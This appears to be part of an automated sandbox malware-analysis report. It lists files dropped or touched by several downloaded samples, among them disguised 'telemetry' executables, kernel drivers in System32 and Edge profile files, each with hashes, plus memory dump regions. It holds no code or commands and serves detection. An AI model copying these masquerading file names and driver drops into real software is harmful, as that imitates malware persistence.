| SHA256 | 370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235 |
| SHA512 | 4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f |
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
| MD5 | e149663730c0b03c8936baffe9645bb4 |
| SHA1 | c0fb146c35d48481df4149027953e4ab7be59e95 |
| SHA256 | 33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469 |
| SHA512 | 553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe |
memory/5628-2205-0x0000000000DF0000-0x0000000000DF6000-memory.dmp
memory/4892-2207-0x0000000000900000-0x0000000000906000-memory.dmp
memory/3592-2218-0x0000000000AD0000-0x0000000000AF0000-memory.dmp
memory/3592-2217-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3592-2215-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3592-2220-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3592-2221-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3592-2223-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3592-2222-0x0000000140000000-0x0000000140786000-memory.dmp
memory/3592-2219-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5268-2226-0x00007FF72D590000-0x00007FF72DEE0000-memory.dmp
memory/3592-2782-0x0000000140000000-0x0000000140786000-memory.dmp
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.zip
| MD5 | 46edb8cbf808ac67b8aee6518fed3524 |
| SHA1 | 19df1a54b868b0e9aa55607e3d0b2311aa1de5c3 |
| SHA256 | dd2afb99bc9b603312979181e1e77653a821ab8faf6a76209fcd55d8e4858fa6 |
| SHA512 | 267d823899cd21321541cf87e76a4c1546055b7b23adb161220b4dd98ad59f0bd7d7973b0cf378baecc14cf3100ced4988d4ef7a236b439df86513126e40f0b5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a7dd98a04fcb48e143e4113175edbae9 |
| SHA1 | 47479495ee17097b5890edc64959fc2efdf3b10c |
| SHA256 | 73ccda33f28c1f26dfd290c7b0f9f71885cd1d818af2139d8d51cd8ce9bb892e |
| SHA512 | 9bdace0c7e87cff95da3d7df4b71b069d59eb34a528f86e32d02facd3854a334e1ee0885b8b5ec945b6ce0341fc1d6e7172f563b0b99b505535a7a3c1e198974 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7b62871a0c4bd757e923546c628f6e87 |
| SHA1 | 44f6fb33ccdb11a08b760d76648e92637fd494b5 |
| SHA256 | 2321e0d211e6b3f19e01c090da8b2b4ce3d8c58ff5f3e55daf5e115d56c5a2e3 |
| SHA512 | 983501bdbea8497bd296facd8f6e6f1bbf7309a8d666c817b646a58a39e05d8959efc9c2439ab3bcb455dfba7336317601212d267a9ba058f1a64a3f1c4f21ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8835a6213c6b571b8893c043131592d3 |
| SHA1 | e151bea23046a89adf21112e5fb6be7ad226314d |
| SHA256 | 1c65962be74267bfe0a3e78f1dc84a49fe280bc0f425596ce5b77b1f0a67f363 |
| SHA512 | 66d351ef2b5fcb9287fdddf794f2fae3b20d72394e5981468d994caf75cdbffacb731923f70e22c8b6840874c38e82501bf0e6233823f74f7611cb853eefae85 |
memory/4304-2872-0x000000001C550000-0x000000001C958000-memory.dmp
memory/5324-2873-0x0000022A7FEE0000-0x0000022A7FF02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_omtiaip5.ghh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost64.exe
| MD5 | 61401c058754b5808345e5803e98a75b |
| SHA1 | 331e4965f96a1d01628924c755222ce7d73db054 |
| SHA256 | e57d4f020dcc00cf051e4b5b24af16473c6ae5fa18138dc36aa0c08e1f0254dd |
| SHA512 | f3cf07fb4f5ed25599f0fa4ecacbf23cb6b354dcdbfe68115a0e82586016f55fa8f17fb618a1f78b289044496270b7e5eb2f496869194099fe2d5fb1354d4c61 |
memory/4268-2945-0x0000000140000000-0x0000000140787000-memory.dmp
memory/4268-2946-0x0000000140000000-0x0000000140787000-memory.dmp
memory/4268-2948-0x0000000140000000-0x0000000140787000-memory.dmp
memory/4268-2951-0x0000000140000000-0x0000000140787000-memory.dmp
memory/4268-2950-0x0000000140000000-0x0000000140787000-memory.dmp
memory/4268-2949-0x0000000140000000-0x0000000140787000-memory.dmp
memory/4268-2952-0x0000000140000000-0x0000000140787000-memory.dmp
memory/4268-2953-0x0000000140000000-0x0000000140787000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\libs\WR64.sys
| MD5 | 0c0195c48b6b8582fa6f6373032118da |
| SHA1 | d25340ae8e92a6d29f599fef426a2bc1b5217299 |
| SHA256 | 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 |
| SHA512 | ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | a7d1701142cca705f833d70023ef4e1e |
| SHA1 | 1b76853132abfcddb4fefac42bf9df5d013c9815 |
| SHA256 | 6c92f51e7f056e73c407228fc280cb7ca4d00ab02674d1dda4eafd7dc9f070f7 |
| SHA512 | 806b7ccb375cc6116e64a9fa15229d783615d13b54cf40251561d9b664f0925915c5375ad88f5ca8d061e01367de239c29da79adf693559af53eeb7d9b1ba1a0 |
memory/4904-3016-0x000001A34EEB0000-0x000001A34EEB7000-memory.dmp
memory/4904-3017-0x000001A350AE0000-0x000001A350AE6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 335780a871f35c0f2bffa85dd516763c |
| SHA1 | dddf9fd7219130f913ee47aa59ca1c2a546bfa6a |
| SHA256 | 53b5f408e162704c7e54d39aedd41452133e15f374894c1c5d85a1629b0dc3bd |
| SHA512 | 40f60bc99425f1a1be42bab4185f041284288935d4525a9a4ec2c70bf998363bc2c7e8f8cc8d8901f5f31bcde6c2f5f432fdb448cdc0deea896f956a60b644c6 |
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.zip
| MD5 | 24145ea6978ba4df0eb7006cbb874053 |
| SHA1 | 24a9ebffae644b5fb473e6715d8d7b778e23f8bf |
| SHA256 | e387bab1ada765c74993d402f18ddb9b6ee4a3acec62f3cb1bfaceb65d17d201 |
| SHA512 | c87bf84b9281be94fe625d0cee71de37c50e949bf84951f95516ea2e9646e1247a77147bb1b993224d556fcda90132e55bb7e237ee64568d63fbc7b9523fd0dd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | eea4e3d9e5f220c8a59eabbcaeb4cb1c |
| SHA1 | dd8840886c0285f21aeae73b2ae0093e56666fea |
| SHA256 | 8c5f7b65658d630cf7916e341d63c22c0d8666b4e176ef4348ecdec2c54ddb2f |
| SHA512 | c7237a0208e6d8ef55a91d458a940a56e18ee17e7fcf7830f46ca885ad0f46c3f6b87a506520c315a22ba331d630b8025a9a4f5c34452b18d5735bd1e53883f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0eedd379dee511aca53e7c66895401dc |
| SHA1 | 5985ee9b73b41bcd5f3980bb74b042492315e7ca |
| SHA256 | 224c69639ff5781e3798d9f9cae589663682842ba67ea62a1909cafed1b334ef |
| SHA512 | 9446cfc6060398b1af223d50ae50c2479e11deddb2dbacd68e849d7a4ca9a49e5e2c41ff9a78ae893442f80ae096fd6c5f1621ee40dfaf1c915cd42761899634 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a3b8d785a4b4c28c304021bfcabce531 |
| SHA1 | baaf0b6cddab2ea7cb8eac6e274263025bd95386 |
| SHA256 | b274e126ff817539393a367ed380428fe86e7d417527ce61ce0745308320656e |
| SHA512 | f6c57c008d4ce341d2cb74565cd4c07c8b3cbce71081d92495a68d3dd7fd9a923fe01a1ea7aeae214ccfb6905eebab5ccc8acd64721b56611f17596ec1fb80af |
memory/1468-3106-0x0000000000400000-0x00000000005D4000-memory.dmp
memory/1468-3105-0x0000000000400000-0x00000000005D4000-memory.dmp
memory/1468-3118-0x0000000000400000-0x00000000005D4000-memory.dmp
memory/1468-3124-0x0000000000400000-0x00000000005D4000-memory.dmp
memory/1468-3127-0x0000000000400000-0x00000000005D4000-memory.dmp
C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.zip
| MD5 | 48229dbff14bbf423a5f9518c4118e92 |
| SHA1 | 498086d5ce4103bd2a8cde781370827d4f168717 |
| SHA256 | d615ed7590714a88e818ff6cc2c1c6681472776116d5075f4aa3d6f053256b25 |
| SHA512 | aa7563eb95de8398f767274a1dedcd792e9b14c9ab2930538fb28479e2267314d10002f4679ebee6abcbb11bacf60523b8125c6a211259a16ec1f46943713a53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | eaf18393b12f199ecf23ec652e9aea70 |
| SHA1 | b6a2252f2596b3128e8a971ac44d351d674fb477 |
| SHA256 | 46afaceb0397a9b31bfe4ee720e388c2539fdbf5397f2f151ca894f3e854af09 |
| SHA512 | cb1cd706b236095dcb49e6d4bc74f28b2fb54060c6fde81be56306aeb2a2d36d6b4dfa7d3209ac0b0c55cfd2416b9addb04caca8b3416a20db85b3f98ad6fbda |
C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.zip
| MD5 | 51736f9d8505e8af4be3c51a7a3e7efd |
| SHA1 | 2791751a5bfe3f4d4d1a1bb6755c082df6eda072 |
| SHA256 | 268e285a2aac720fb69d680da6634fce9e27663efd77833f572a8bc56cb5daa9 |
| SHA512 | a68c16a38a193d121f0496982ef2646e0a0bf7e7235477620d5a65e7e4a53c266a8a8895b274552112e171c5cb06be04bf1b26f19dd60ce728c5a97a3671f0a7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e4f412b5b98bc4291eb45954ff708111 |
| SHA1 | 1abec7290671662dabed732ab34f4ae65d040d79 |
| SHA256 | 220294ce4be183e5dcd7c24766764e0525a6e52fcac72d8e830c87fec276b70c |
| SHA512 | 775f0e55b1777fa90f472b5f07dbca6cb5fa46b861167ad3c9ab553347d3988ac0e6ec30671e0ef2c610112205c50a60fc34680b0683b18fe3b53ce2ebb1f304 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024
| MD5 | d3d0be3373e954d550e93822a6619eee |
| SHA1 | a71291bd96edca3b44a429922a0f2c2a488a0a96 |
| SHA256 | 067c036cbf52b713cf9cc6339713c48c2e09ff0b52516f715cccde88ffb58a36 |
| SHA512 | 6fb78051e44645d23a83c79dfd17ae0e563e024be6d19058b67fd71b45e01f94ba3d0e3ee4046684ad23e07409a87691a044394191be3015a55d62e0c530909c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6ab3512801330e4d7186a328ab5dbd78 |
| SHA1 | 3cdbfb036a95af884df4d376270d08d75ba1c707 |
| SHA256 | 95ab188537aca438715dab2f144d7b1a857b6d5602050372fc268dcec594433d |
| SHA512 | ef08bb949bcf4f2cdf7254ecaf2022c828786c294781dab02dafa38df094e34c3ae84b9aee51e49b77c99b34db0446256950aa26bf5a630d1b103d2a8e8a68af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1132342701dc94e735fa988e6d4273b4 |
| SHA1 | 93811f7c9956013b1d4a9c95f6c50083b36110c4 |
| SHA256 | fa859471c53df1129d23ead986805f2d721f8c04ba1965782eea9b179fe77651 |
| SHA512 | 42bd29fb3bfd02dd57d5f29625baecd8dad045db78a3ea165b96eec7b3a25b667d1037307e8cabf04ce586a0c0450cdd298ada39d368a9901c7475a6849ae519 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 50d11d39d9eed4a6350323ef2d609bff |
| SHA1 | bd04044bf2dcca196a06436c47bf9cc6db4f55b4 |
| SHA256 | fc317d31979ca038adaaeb47fd7e4763e1e603d47ad63d42312a01ffa3b72976 |
| SHA512 | d67c753560533be71fff4809314e5c4061a17f7319d96282282c2fdce35e3596817dd443c66e3a438c9590d458cc4b70885eac202226c9f647286adc5a00088e |
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
| MD5 | 1d14b0f09353afef218955d42faad64b |
| SHA1 | bedc266cff4602dd864b263e55c52e1f6da4bcf1 |
| SHA256 | c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273 |
| SHA512 | 206567060c37d09f94d63ac3ad32ff063341b0f56dc1a909666e42992193eee604d683cc9a4a54051e103c346cae3bb014fe11b7e419a09a5896635a516c8e2f |
C:\Users\Admin\Downloads\2828fabf3937d88b85183664c9019c4639776ba7c2322f48e4957108ef07ed65.exe
| MD5 | 69828a3d5c60eb466c3a62f3389f6f87 |
| SHA1 | 7b9526f82448d0a1fb59a8125d1de55e3a166d72 |
| SHA256 | 2828fabf3937d88b85183664c9019c4639776ba7c2322f48e4957108ef07ed65 |
| SHA512 | ce8818f78b62453fb56fcaf98efa7bc52068f7ddf915e1df6841f33a39aff6bd7c60692af16ea361cdf15b3cc79787e4a39bb6648faffc3eaac10ce886b45d5f |
C:\Windows\System32\drivers\jldr
| MD5 | a952e288a1ead66490b3275a807f52e5 |
| SHA1 | 5ceebaf1cbb0c10b95f7edd458804a646c6f215e |
| SHA256 | e5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 |
| SHA512 | 871250ed8779d3f6e0adde5b1e9be0b818e157dfd1ea3755c161fc6604185370a55fa0b37c2b9249b05dc5da6182e7be6b2a5ade0b67e104e8d9cea01eae2f94 |
memory/5660-3287-0x0000000000400000-0x00000000005D4000-memory.dmp
memory/3916-3289-0x00007FF6D5A50000-0x00007FF6D63A0000-memory.dmp
memory/3916-3288-0x00007FF830530000-0x00007FF830532000-memory.dmp
C:\Windows\System32\drivers\vfdr.sys
| MD5 | 6106653b08f4f72eeaa7f099e7c408a4 |
| SHA1 | 0e84aff18d42fc691cb1104018f44403c325ad21 |
| SHA256 | 96b77284744f8761c4f2558388e0aee2140618b484ff53fa8b222b340d2a9c84 |
| SHA512 | 92b20c99f96907eea3818ba36516e5fa8b5e6ff7a2981177115633e11ba23f9e5a4aa0e8e9d7d8c448e9d5d8fa5e0eb75e44694942f5e4da98a85419db126162 |
C:\ProgramData\TywqfYfUij\UyHosmin
| MD5 | 70638e8d022aad237149c976a5fb76fe |
| SHA1 | d9efcfd0628d2906ac8b2457137aeec0f85849dd |
| SHA256 | ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92 |
| SHA512 | 6615c451bf6b4cf866be8b5d9555aca2ba7c66e9ee206fb50f75b4d8cd0d72335beecb90fc18f4b1a85889203b14f4174725c91dc63a25f6c77c0edfa483e0e6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 275f488816b3916768a45c0a49eee28d |
| SHA1 | 51c77a40232eb15d6254f804ae10db2972d66b5f |
| SHA256 | bd7a193878d87f870f6ea718f1b05dba798e82598f8409c0dbcba4b580875bf9 |
| SHA512 | b22d4eb74ae881ff3216671ee4f06e00ddb2206c0fa7e651949e0458aaf1331c0d9cca0b0a91be202567c1782acc8996cc74246e01630ed669fcfad8523cf032 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | baa78e296124f0aa0f845f478bb23dfc |
| SHA1 | 4decf288fc86b2b3d3ac82b71fa9e12eaf7ac439 |
| SHA256 | 35f05c0bde2279c02f339552b1e38f943be1c99f90a60102fb1fd271aaba5f54 |
| SHA512 | 6d464103485a3d452a6c1889b1182ef030edb8adc0cf1f62dcd1e8ee39220871b355e122c818a0bc4dd96558815c51c1ef4a7548edbe8262e2dd5e847c8c5ca9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e57935dcc7156cf77c626e07f09def35 |
| SHA1 | 7c68ed0dabcacea17675a24dab7ef3c0d5782059 |
| SHA256 | 2fe701be566bf8cfa05a1b218b45bfcbda933c88d4888c2be2b92aecea7ed7c0 |
| SHA512 | 39a66771a2bf824a9b107c0572f3480059b261c974cd666427f1f950ba21d5fff876cfb0f21ce185794766c1ffd65e28b3166c276ebc04342ec5d6b2bf2b2dc0 |